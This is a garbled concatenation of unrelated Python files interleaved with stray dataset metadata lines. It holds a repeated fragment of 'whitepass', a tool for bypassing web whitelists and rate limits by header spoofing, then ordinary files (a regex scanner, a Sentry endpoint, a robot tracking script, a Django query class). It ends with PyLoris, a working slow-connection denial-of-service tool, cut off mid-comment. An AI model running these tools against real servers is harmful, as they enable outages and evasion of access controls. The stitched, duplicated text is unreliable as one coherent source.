if validate_url(url): urls.append(validate_url(url)) else: print("bad url bro") exit() if urllist: if os.path.exists(urllist): for p in open(urllist,'r').readlines(): p = p.replace('\n', '') v = validate_url(p) urls.append(p) if v and (not p in headers) else None else: print("list not exit exit") exit() if not urls and not requestFile: print("all targets are bad bro") exit() if requestFile: if os.path.exists(requestFile): data = parseRequestFile(requestFile) request_method = data.get('method',None) url = data.get('url',None) additionalrequest_data = data.get('data',dict()) additionalrequest_headers = data.get('headers',dict()) if url and request_method: if additionalrequest_data: additionalrequest_data = {x[0] : x[1] for x in [x.split("=") for x in additionalrequest_data[1:].split("&") ]} else: additionalrequest_data = dict() else: print("make sure that you got the file using 'save item' in burp") exit() start_whitepass(url=url,method=request_method,data=additionalrequest_data,headers=additionalrequest_headers) elif len(urls): for url in urls: start_whitepass(url=url,method=request_method,data=additionalrequest_data,headers=additionalrequest_headers) def main(): print(banner) parser = argparse.ArgumentParser(add_help=True) target = parser.add_argument_group("Target", "At least one of these options has to be provided to define the target(s)") target.add_argument("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/api/login\")") target.add_argument("-l", dest="urllist", help="load target(s) from text file") target.add_argument("-r", dest="requestFile", help="Load HTTP request from a Burp request file or normal plain-text") request_option = parser.add_argument_group("Request", "These options can be used to specify how to connect to the target URL") request_option.add_argument("-m", dest="http_method", help="HTTP Method used to test ", default="GET") request_option.add_argument("--headers", dest="headers", help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") request_option.add_argument("--data", dest="data", help="Data string to be sent through POST (e.g. \"id=1&name=wazehell\")") payload_option = parser.add_argument_group("Payloads", "These options can be used to specify payloads") payload_option.add_argument("-aH", "--headers-list", dest="additionalheaders", help="Load Extra header(s) keys from text file") payload_option.add_argument("-aP", "--payloads", dest="additionalpayloads", help="Load Extra payload(s) from text file") payload_option.add_argument("-aL", "--proxies", dest="proxylist", help="Load proxies from text file ip:port") payload_option.add_argument("--ips", dest="known_ips", help="Known External/Internal IPs for the target comma separated (e.g. \"10.10.1.5,172.16.58.3\")") payload_option.add_argument("--threads", dest="threads", type=int, help="Max number of concurrent HTTP(s) requests (default %d)" % DEFAULT_THREADS) (args, _) = parser.parse_known_args(sys.argv) if not any((args.urllist, args.url, args.requestFile)): errMsg = "missing a mandatory option (-l or -u or -r). " errMsg += "Use -h for help\n" parser.error(errMsg) else: request_options= { 'method':args.http_method, 'headers':args.headers, 'data':args.data, } target_options = { 'urllist':args.urllist, 'url':args.url, 'requestFile':args.requestFile, } payload_options = { 'additionalheaders':args.additionalheaders, 'additionalpayloads':args.additionalpayloads, 'proxylist':args.proxylist, 'known_ips':args.known_ips, 'threads':args.threads, } whitepass(request_options=request_options,target_options=target_options,payload_options=payload_options) if __name__ == "__main__": main()
#!/usr/bin/env python3 from utils import * import argparse import sys import os import requests import random import concurrent.futures import threading import time from concurrent.futures import ThreadPoolExecutor, as_completed banner = """ ██╗ ██╗██╗ ██╗██╗████████╗███████╗██████╗ █████╗ ███████╗███████╗ ██║ ██║██║ ██║██║╚══██╔══╝██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝ ██║ █╗ ██║███████║██║ ██║ █████╗ ██████╔╝███████║███████╗███████╗ ██║███╗██║██╔══██║██║ ██║ ██╔══╝ ██╔═══╝ ██╔══██║╚════██║╚════██║ ╚███╔███╔╝██║ ██║██║ ██║ ███████╗██║ ██║ ██║███████║███████║ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝ Bypass Whitelist/Ratelimit Implementations in Web Applications/APIs By : <NAME> (@wazehell) (Cyber Struggle Delta Group) """ KNOWN_PAYLOADS_PATH = "./db/known_payloads.txt" KNOWN_HEADERS_PATH = "./db/headers.txt" DEFAULT_THREADS = 50 ALL_PAYLOADS = None PROXIES_LIST = [] def start_whitepass(url=None,method="get",data={},headers={}): request_headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} request_headers.update(headers) request_data = {} proxies = {} request_data.update(data) request_func = None bad_http = [400,500,407,408,405,429] content_len = 0 http_status = 200 http_timeout = 120 try: request_func = getattr(requests, method.lower()) except Exception as e: print("[*] Method Not found !") exit() def do_request(payload={}): try: reqproxies = {} pxomsg = "" if len(PROXIES_LIST): reqproxies = random.choice(PROXIES_LIST) headers = request_headers.copy() headers.update(payload) req = request_func(url,headers=headers,data=data,timeout=http_timeout,proxies=reqproxies) reqc = req.headers.get('Content-Length',0) if len(PROXIES_LIST): pxomsg = f" via ({reqproxies['http']})" else: pxomsg = f" via localhost " if not reqc == content_len and (not int(req.status_code) in bad_http): print(f"[+] {pxomsg} Response with Diffrent Content-Length Using Header : {payload}") if not http_status == req.status_code and (not int(req.status_code) in bad_http): print(f"[+] {pxomsg} Response with Diffrent HTTP-Status Using Header : {payload}") return req except Exception as e: pass #testing stage try: req0 = request_func(url,headers=headers,data=data,timeout=http_timeout) req0c = req0.headers.get('Content-Length',0) data.update({'test':str('A'*50)}) req1 = request_func(url,headers=headers,data=data,timeout=http_timeout) req1c = req1.headers.get('Content-Length',0) req2 = request_func(url,headers=headers,params=data,timeout=http_timeout) req2c = req2.headers.get('Content-Length',0) data.update({'test':str('A'*100)}) req3 = request_func(url,headers=headers,params=data,timeout=120) req3c = req3.headers.get('Content-Length',0) if req0c == req1c == req2c: content_len = req0c else: if int(int(req2c) - int(req0c)) == 50: content_len = req0c else: #todo pass if req0.status_code == req2.status_code == req3.status_code: http_status = req0.status_code else: http_status = req0.status_code #todo if http_status == 429: http_status = 200 print(f'[*] Content-Length Response {content_len}') print(f'[*] HTTP-Status Response {http_status}') except Exception as e: pass start = time.time() processes = [] print(f"[*] Starting Test with {len(ALL_PAYLOADS)} Payload") with ThreadPoolExecutor(max_workers=DEFAULT_THREADS) as executor: for payload in ALL_PAYLOADS: processes.append(executor.submit(do_request, payload)) print(f'[*] Testing Done : {time.time() - start}') def whitepass(request_options=None,target_options=None,payload_options=None): global KNOWN_PAYLOADS_PATH,KNOWN_HEADERS_PATH,DEFAULT_THREADS global ALL_PAYLOADS,PROXIES_LIST parsed_request = None additionalrequest_headers = {} additionalrequest_data = {} urllist = target_options['urllist'] url = target_options['url'] requestFile = target_options['requestFile'] request_method = request_options.get('method','get') request_headers = request_options.get('headers',None) request_data = request_options.get('data',None) known_ips = payload_options['known_ips'] additionalheaders = payload_options['additionalheaders'] proxylist = payload_options['proxylist'] additionalpayloads = payload_options['additionalpayloads'] threads = payload_options.get('threads',DEFAULT_THREADS) if threads: DEFAULT_THREADS = int(threads) if request_headers: for reqheader in request_headers.split('\\n'): headerk = str(reqheader.split(':')[0]).replace(' ','') headerv = str(reqheader.split(':')[1]).replace(' ','') additionalrequest_headers[headerk] = headerv if request_data: additionalrequest_data = {x[0] : x[1] for x in [x.split("=") for x in request_data[1:].split("&") ]} if proxylist: if os.path.exists(proxylist): for p in open(proxylist,'r').readlines(): p = p.replace('\n', '') g = p.split(':') proxy_object = { 'http': f'http://{g[0]}:{g[1]}', 'https': f'http://{g[0]}:{g[1]}', } PROXIES_LIST.append(proxy_object) payloads = prepre_payloads(known_ips=known_ips,known_payloads_path=KNOWN_PAYLOADS_PATH, additionalpayloads=additionalpayloads) headers = prepre_headers(additionalheaders=additionalheaders, known_headers_path=KNOWN_HEADERS_PATH) ALL_PAYLOADS = prepare_all(headers=headers,payloads=payloads) urls = [] if url: if validate_url(url): urls.append(validate_url(url)) else: print("bad url bro") exit() if urllist: if os.path.exists(urllist): for p in open(urllist,'r').readlines(): p = p.replace('\n', '') v = validate_url(p) urls.append(p) if v and (not p in headers) else None else: print("list not exit exit") exit() if not urls and not requestFile: print("all targets are bad bro") exit() if requestFile: if os.path.exists(requestFile): data = parseRequestFile(requestFile) request_method = data.get('method',None) url = data.get('url',None) additionalrequest_data = data.get('data',dict()) additionalrequest_headers = data.get('headers',dict()) if url and request_method: if additionalrequest_data: additionalrequest_data = {x[0] : x[1] for x in [x.split("=") for x in additionalrequest_data[1:].split("&") ]} else: additionalrequest_data = dict() else: print("make sure that you got the file using 'save item' in burp") exit() start_whitepass(url=url,method=request_method,data=additionalrequest_data,headers=additionalrequest_headers) elif len(urls): for url in urls: start_whitepass(url=url,method=request_method,data=additionalrequest_data,headers=additionalrequest_headers) def main(): print(banner) parser = argparse.ArgumentParser(add_help=True) target = parser.add_argument_group("Target", "At least one of these options has to be provided to define the target(s)") target.add_argument("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/api/login\")") target.add_argument("-l", dest="urllist", help="load target(s) from text file") target.add_argument("-r", dest="requestFile", help="Load HTTP request from a Burp request file or normal plain-text") request_option = parser.add_argument_group("Request", "These options can be used to specify how to connect to the target URL") request_option.add_argument("-m", dest="http_method", help="HTTP Method used to test ", default="GET") request_option.add_argument("--headers", dest="headers", help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") request_option.add_argument("--data", dest="data", help="Data string to be sent through POST (e.g. \"id=1&name=wazehell\")") payload_option = parser.add_argument_group("Payloads", "These options can be used to specify payloads") payload_option.add_argument("-aH", "--headers-list", dest="additionalheaders", help="Load Extra header(s) keys from text file") payload_option.add_argument("-aP", "--payloads", dest="additionalpayloads", help="Load Extra payload(s) from text file") payload_option.add_argument("-aL", "--proxies", dest="proxylist", help="Load proxies from text file ip:port") payload_option.add_argument("--ips", dest="known_ips", help="Known External/Internal IPs for the target comma separated (e.g. \"10.10.1.5,172.16.58.3\")") payload_option.add_argument("--threads", dest="threads", type=int, help="Max number of concurrent HTTP(s) requests (default %d)" % DEFAULT_THREADS) (args, _) = parser.parse_known_args(sys.argv) if not any((args.urllist, args.url, args.requestFile)): errMsg = "missing a mandatory option (-l or -u or -r). " errMsg += "Use -h for help\n" parser.error(errMsg) else: request_options= { 'method':args.http_method, 'headers':args.headers, 'data':args.data, } target_options = { 'urllist':args.urllist, 'url':args.url, 'requestFile':args.requestFile, } payload_options = { 'additionalheaders':args.additionalheaders, 'additionalpayloads':args.additionalpayloads, 'proxylist':args.proxylist, 'known_ips':args.known_ips, 'threads':args.threads, } whitepass(request_options=request_options,target_options=target_options,payload_options=payload_options) if __name__ == "__main__": main()
en
0.140276
#!/usr/bin/env python3 ██╗ ██╗██╗ ██╗██╗████████╗███████╗██████╗ █████╗ ███████╗███████╗ ██║ ██║██║ ██║██║╚══██╔══╝██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝ ██║ █╗ ██║███████║██║ ██║ █████╗ ██████╔╝███████║███████╗███████╗ ██║███╗██║██╔══██║██║ ██║ ██╔══╝ ██╔═══╝ ██╔══██║╚════██║╚════██║ ╚███╔███╔╝██║ ██║██║ ██║ ███████╗██║ ██║ ██║███████║███████║ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝ Bypass Whitelist/Ratelimit Implementations in Web Applications/APIs By : <NAME> (@wazehell) (Cyber Struggle Delta Group) #testing stage #todo #todo
2.623601
3
ifparser/re_scan.py
trevormccasland/ifconfig-parser
19
6618626
<reponame>trevormccasland/ifconfig-parser<gh_stars>10-100 """ Copyright (c) 2015 by <NAME>. Some rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * The names of the contributors may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ from __future__ import unicode_literals, print_function import sys from sre_compile import compile as sre_compile from sre_constants import BRANCH, SUBPATTERN from sre_parse import Pattern, SubPattern, parse class _ScanMatch(object): def __init__(self, match, rule, start, end): self._match = match self._start = start self._end = end self._rule = rule def __getattr__(self, name): return getattr(self._match, name) def __group_proc(self, method, group): if group == 0: return method() if isinstance(group, basestring): return method(self._rule + '\x00' + group) real_group = self._start + group if real_group > self._end: raise IndexError('no such group') return method(real_group) def group(self, *groups): if len(groups) in (0, 1): return self.__group_proc(self._match.group, groups and groups[0] or 0) return tuple( self.__group_proc(self._match.group, group) for group in groups) def groupdict(self, default=None): prefix = self._rule + '\x00' rv = {} for key, value in self._match.groupdict(default).items(): if key.startswith(prefix): rv[key[len(prefix):]] = value return rv def span(self, group=0): return self.__group_proc(self._match.span, group) def groups(self): return self._match.groups()[self._start:self._end] def start(self, group=0): return self.__group_proc(self._match.start, group) def end(self, group=0): return self.__group_proc(self._match.end, group) def expand(self, template): raise RuntimeError('Unsupported on scan matches') class ScanEnd(Exception): def __init__(self, pos): Exception.__init__(self, pos) self.pos = pos class Scanner(object): def __init__(self, rules, flags=0): pattern = Pattern() pattern.flags = flags if sys.version_info < (3, 0): pattern.groups = len(rules) + 1 _og = pattern.opengroup pattern.opengroup = lambda n: _og(n and '%s\x00%s' % (name, n) or n) self.rules = [] subpatterns = [] for group, (name, regex) in enumerate(rules, 1): last_group = pattern.groups - 1 subpatterns.append( SubPattern(pattern, [ (SUBPATTERN, (group, parse(regex, flags, pattern))), ])) self.rules.append((name, last_group, pattern.groups - 1)) self._scanner = sre_compile( SubPattern(pattern, [(BRANCH, (None, subpatterns))])).scanner def scan(self, string, skip=False): sc = self._scanner(string) match = None for match in iter(sc.search if skip else sc.match, None): rule, start, end = self.rules[match.lastindex - 1] yield rule, _ScanMatch(match, rule, start, end) if not skip: end = match and match.end() or 0 if end < len(string): raise ScanEnd(end) def scan_with_holes(self, string): pos = 0 for rule, match in self.scan(string, skip=True): hole = string[pos:match.start()] if hole: yield None, hole yield rule, match pos = match.end() hole = string[pos:] if hole: yield None, hole
""" Copyright (c) 2015 by <NAME>. Some rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * The names of the contributors may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ from __future__ import unicode_literals, print_function import sys from sre_compile import compile as sre_compile from sre_constants import BRANCH, SUBPATTERN from sre_parse import Pattern, SubPattern, parse class _ScanMatch(object): def __init__(self, match, rule, start, end): self._match = match self._start = start self._end = end self._rule = rule def __getattr__(self, name): return getattr(self._match, name) def __group_proc(self, method, group): if group == 0: return method() if isinstance(group, basestring): return method(self._rule + '\x00' + group) real_group = self._start + group if real_group > self._end: raise IndexError('no such group') return method(real_group) def group(self, *groups): if len(groups) in (0, 1): return self.__group_proc(self._match.group, groups and groups[0] or 0) return tuple( self.__group_proc(self._match.group, group) for group in groups) def groupdict(self, default=None): prefix = self._rule + '\x00' rv = {} for key, value in self._match.groupdict(default).items(): if key.startswith(prefix): rv[key[len(prefix):]] = value return rv def span(self, group=0): return self.__group_proc(self._match.span, group) def groups(self): return self._match.groups()[self._start:self._end] def start(self, group=0): return self.__group_proc(self._match.start, group) def end(self, group=0): return self.__group_proc(self._match.end, group) def expand(self, template): raise RuntimeError('Unsupported on scan matches') class ScanEnd(Exception): def __init__(self, pos): Exception.__init__(self, pos) self.pos = pos class Scanner(object): def __init__(self, rules, flags=0): pattern = Pattern() pattern.flags = flags if sys.version_info < (3, 0): pattern.groups = len(rules) + 1 _og = pattern.opengroup pattern.opengroup = lambda n: _og(n and '%s\x00%s' % (name, n) or n) self.rules = [] subpatterns = [] for group, (name, regex) in enumerate(rules, 1): last_group = pattern.groups - 1 subpatterns.append( SubPattern(pattern, [ (SUBPATTERN, (group, parse(regex, flags, pattern))), ])) self.rules.append((name, last_group, pattern.groups - 1)) self._scanner = sre_compile( SubPattern(pattern, [(BRANCH, (None, subpatterns))])).scanner def scan(self, string, skip=False): sc = self._scanner(string) match = None for match in iter(sc.search if skip else sc.match, None): rule, start, end = self.rules[match.lastindex - 1] yield rule, _ScanMatch(match, rule, start, end) if not skip: end = match and match.end() or 0 if end < len(string): raise ScanEnd(end) def scan_with_holes(self, string): pos = 0 for rule, match in self.scan(string, skip=True): hole = string[pos:match.start()] if hole: yield None, hole yield rule, match pos = match.end() hole = string[pos:] if hole: yield None, hole
en
0.72574
Copyright (c) 2015 by <NAME>. Some rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * The names of the contributors may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
1.695048
2
src/sentry/api/endpoints/release_details.py
arsh-co/sentry
0
6618627
from __future__ import absolute_import from rest_framework.response import Response from sentry.api.base import DocSection, Endpoint from sentry.api.permissions import assert_perm from sentry.api.serializers import serialize from sentry.models import Release class ReleaseDetailsEndpoint(Endpoint): doc_section = DocSection.RELEASES def get(self, request, release_id): """ Retrieve an release Return details on an individual release. {method} {path} """ release = Release.objects.get(id=release_id) assert_perm(release, request.user, request.auth) return Response(serialize(release, request.user))
from __future__ import absolute_import from rest_framework.response import Response from sentry.api.base import DocSection, Endpoint from sentry.api.permissions import assert_perm from sentry.api.serializers import serialize from sentry.models import Release class ReleaseDetailsEndpoint(Endpoint): doc_section = DocSection.RELEASES def get(self, request, release_id): """ Retrieve an release Return details on an individual release. {method} {path} """ release = Release.objects.get(id=release_id) assert_perm(release, request.user, request.auth) return Response(serialize(release, request.user))
en
0.710513
Retrieve an release Return details on an individual release. {method} {path}
2.115279
2
home/GroG/workyTracking.py
rv8flyboy/pyrobotlab
63
6618628
<filename>home/GroG/workyTracking.py useVirtualArduino = True; xPin = 9; yPin = 6; arduinoPort = "COM5"; cameraIndex = 0; # using Sarxos for usb webcam, the other frame grabbers only worked on my integrated camera frameGrabberType = "org.myrobotlab.opencv.SarxosFrameGrabber"; Runtime.start("gui", "SwingGui"); if useVirtualArduino: virtual = Runtime.start("virtual", "VirtualArduino"); virtual.connect(arduinoPort); t01 = Runtime.start("t01", "Tracking"); x = t01.getX(); # invert if necessary # x.setInverted(True); y = t01.getY(); # invert if necessary # y.setInverted(True); t01.connect(arduinoPort, xPin, yPin, cameraIndex); opencv = t01.getOpenCV(); # noticed some swing display issues - I don't think Sarxos gets updated to display opencv.setFrameGrabberType(frameGrabberType); opencv.broadcastState(); # not sure if necessary - but get things to settle for 3 seconds # before starting tracking sleep(3); # do lk optical point tracking # t01.startLKTracking(); # do face tracking t01.faceDetect();
<filename>home/GroG/workyTracking.py useVirtualArduino = True; xPin = 9; yPin = 6; arduinoPort = "COM5"; cameraIndex = 0; # using Sarxos for usb webcam, the other frame grabbers only worked on my integrated camera frameGrabberType = "org.myrobotlab.opencv.SarxosFrameGrabber"; Runtime.start("gui", "SwingGui"); if useVirtualArduino: virtual = Runtime.start("virtual", "VirtualArduino"); virtual.connect(arduinoPort); t01 = Runtime.start("t01", "Tracking"); x = t01.getX(); # invert if necessary # x.setInverted(True); y = t01.getY(); # invert if necessary # y.setInverted(True); t01.connect(arduinoPort, xPin, yPin, cameraIndex); opencv = t01.getOpenCV(); # noticed some swing display issues - I don't think Sarxos gets updated to display opencv.setFrameGrabberType(frameGrabberType); opencv.broadcastState(); # not sure if necessary - but get things to settle for 3 seconds # before starting tracking sleep(3); # do lk optical point tracking # t01.startLKTracking(); # do face tracking t01.faceDetect();
en
0.60676
# using Sarxos for usb webcam, the other frame grabbers only worked on my integrated camera # invert if necessary # x.setInverted(True); # invert if necessary # y.setInverted(True); # noticed some swing display issues - I don't think Sarxos gets updated to display # not sure if necessary - but get things to settle for 3 seconds # before starting tracking # do lk optical point tracking # t01.startLKTracking(); # do face tracking
1.889813
2
django_pg/models/sql/query.py
OlgaBorisova/django-pgfields
1
6618629
from __future__ import absolute_import, unicode_literals from django.db.models.sql import query from django_pg.utils.gis import gis_backend if gis_backend: from django.contrib.gis.db.models.sql import query as gis_query DJANGO_PG_QUERY_TERMS = { 'len' } class Query(query.Query): query_terms = query.Query.query_terms.union(DJANGO_PG_QUERY_TERMS) if gis_backend: class GeoQuery(gis_query.GeoQuery): query_terms = gis_query.GeoQuery.query_terms.union( DJANGO_PG_QUERY_TERMS, )
from __future__ import absolute_import, unicode_literals from django.db.models.sql import query from django_pg.utils.gis import gis_backend if gis_backend: from django.contrib.gis.db.models.sql import query as gis_query DJANGO_PG_QUERY_TERMS = { 'len' } class Query(query.Query): query_terms = query.Query.query_terms.union(DJANGO_PG_QUERY_TERMS) if gis_backend: class GeoQuery(gis_query.GeoQuery): query_terms = gis_query.GeoQuery.query_terms.union( DJANGO_PG_QUERY_TERMS, )
none
1
1.86463
2
pyloris/libloris.py
Marzooq13579/Hack-Gadgets
8
6618630
<reponame>Marzooq13579/Hack-Gadgets #!/usr/bin/env python """ libloris.py This is the main bulk of the PyLoris toolkit. This file contains: def DefaultOptions - The DefaultOptions function will populate a dict containing all the required options for running a basic PyLoris attack. class Loris - The Loris class is the hammer with which targets are struck. After instantiating this class, one must feed a dict containing connection options through the .LoadOptions member function. After the options are loaded, calling the .start member function will initiate the attack according to options specified. While an attack is underway, one may check the .status for a tuple of (# of total attacks started, # of attack threads, # of current open sockets). From there, you should call .messages.get, errors.get, and debug.get occasionally to gather additional information from PyLoris. See class ScriptLoris for a basic usage of the Loris class. class ScriptLoris - This is a base class for building attack scripts for rapid use or distribution. Simply instantiate a ScriptLoris object, the .options dict properties, and call .mainloop. Once you are satisfied with the results, pass the script along to your friends! """ # Base modules import Queue import socket import thread import threading import time # Some import trickery to get SSL working across Python 2.x versions. try: from ssl import wrap_socket except: wrap_socket = socket.ssl # Local modules import socks def DefaultOptions(): return { 'host' : 'localhost', # Host to attack 'port' : 80, # Port to connect to 'ssl' : False, # Use SSL connections 'attacklimit' : 500, # Total number of times to attack (0 for unlimited) 'connectionlimit' : 500, # Total number of concurrent connections (0 for unlimited) 'threadlimit' : 50, # Total number of threads (0 for unlimited) 'connectionspeed' : 1, # Connection speed in bytes/second 'timebetweenthreads' : 1, # Time delay between starting threads 'timebetweenconnections' : 1, # Time delay between starting connections 'quitimmediately' : False, # Close connections immediately after completing request 'socksversion' : '', # Enable SOCKS proxy, set to SOCKS4, SOCKS5, or HTTP 'sockshost' : '', # SOCKS host 'socksport' : 0, # SOCKS port 'socksuser' : '', # SOCKS username 'sockspass' : '', # SOCKS password 'request' : '', # The main body of the attack } class Loris(threading.Thread): options = {} running = False attacks = 0 threads = 0 sockets = 0 def __init__(self): threading.Thread.__init__(self) self.connections = Queue.Queue() self.errors = Queue.Queue() self.messages = Queue.Queue() self.debug = Queue.Queue() self.options = DefaultOptions() def LoadOptions(self, o): self.options = o.copy() def run(self): self.messages.put('PyLoris is starting up.') self.running = True thread.start_new_thread(self.build_sockets, ()) for id in range(self.options['threadlimit']): thread.start_new_thread(self.attack, (id,)) self.threads += 1 if self.options['timebetweenthreads'] > 0: time.sleep(self.options['timebetweenthreads']) def build_sockets(self): self.debug.put('Socket Builder started.') count = 0 while (self.options['attacklimit'] == 0 or self.options['attacklimit'] > self.attacks) and self.running: if self.options['connectionlimit'] > self.sockets: if self.options['socksversion'] == 'SOCKS4' or self.options['socksversion'] == 'SOCKS5' or self.options['socksversion'] == 'HTTP': if self.options['socksversion'] == 'SOCKS4': proxytype = socks.PROXY_TYPE_SOCKS4 elif self.options['socksversion'] == 'SOCKS5': proxytype = socks.PROXY_TYPE_SOCKS5 else: proxytype = socks.PROXY_TYPE_HTTP s = socks.socksocket() if self.options['socksuser'] == '' and self.options['sockspass'] == '': s.setproxy(proxytype, self.options['sockshost'], self.options['socksport'], self.options['socksuser'], self.options['sockspass']) else: s.setproxy(proxytype, self.options['sockshost'], self.options['socksport']) else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((self.options['host'], self.options['port'])) if self.options['ssl'] == True: wrap_socket(s) self.connections.put((s, 0)) self.debug.put('Socket opened, connection created.') self.attacks += 1 self.sockets += 1 except Exception, ex: self.errors.put('Could not connect. %s.' % (ex)) if self.options['timebetweenconnections'] > 0: time.sleep(self.options['timebetweenconnections']) self.debug.put('Socket Builder finished.') def attack(self, id): self.debug.put('Attack thread %i started' % (id)) while self.running: (s, index) = self.connections.get() try: if len(self.options['request']) > index: s.send(self.options['request'][index]) index += 1 self.connections.put((s, index)) elif self.options['quitimmediately'] == False: data = s.recv(1024) if not len(data): s.close() self.debug.put('Socket closed, data tranfer finished.') self.sockets -= 1 else: self.connections.put((s, index)) else: s.close() self.debug.put('Socket closed, not waiting for response.') self.sockets -= 1 except Exception, ex: self.errors.put(ex) self.debug.put('Socket closed, an exception occurred.') s.close() self.sockets -= 1 if self.sockets == 0 and self.attacks == self.options['attacklimit']: self.debug.put('Attack limit reached, all sockets closed. Shutting down.') self.running = False elif self.sockets > 0 and self.options['connectionspeed'] > 0: time.sleep(1 / self.options['connectionspeed'] / self.sockets * self.threads) elif self.options['connectionspeed'] > 0: time.sleep(1 / self.options['connectionspeed'] * self.threads) self.debug.put('Attack thread %i finished.' % (id)) self.threads -= 1 def status(self): return (self.attacks, self.threads, self.sockets) def stop(self): self.messages.put('PyLoris is shutting down.') self.running = False while not self.connections.empty(): try: s = self.connections.get(True, 30) s.close() self.sockets -= 1 except: pass class ScriptLoris(Loris): def __init__(self): self.options = DefaultOptions() Loris.__init__(self) def mainloop(self): self.start() time.sleep(1) while self.running: status = self.status() try: while True: message = self.messages.get(False) print('[MESSAGE] %s' %(message)) except: pass try: while True: debug = self.debug.get(False) print('[DEBUG] %s' %(debug)) except: pass try: while True: error = self.errors.get(False) print('[ERROR] %s' %(error)) except: pass print 'Loris has started %i attacks, with %i threads and %i connections currently running.' % status time.sleep(1) status = self.status() print 'Pyloris has completed %i attacks.' % (status[0])
#!/usr/bin/env python """ libloris.py This is the main bulk of the PyLoris toolkit. This file contains: def DefaultOptions - The DefaultOptions function will populate a dict containing all the required options for running a basic PyLoris attack. class Loris - The Loris class is the hammer with which targets are struck. After instantiating this class, one must feed a dict containing connection options through the .LoadOptions member function. After the options are loaded, calling the .start member function will initiate the attack according to options specified. While an attack is underway, one may check the .status for a tuple of (# of total attacks started, # of attack threads, # of current open sockets). From there, you should call .messages.get, errors.get, and debug.get occasionally to gather additional information from PyLoris. See class ScriptLoris for a basic usage of the Loris class. class ScriptLoris - This is a base class for building attack scripts for rapid use or distribution. Simply instantiate a ScriptLoris object, the .options dict properties, and call .mainloop. Once you are satisfied with the results, pass the script along to your friends! """ # Base modules import Queue import socket import thread import threading import time # Some import trickery to get SSL working across 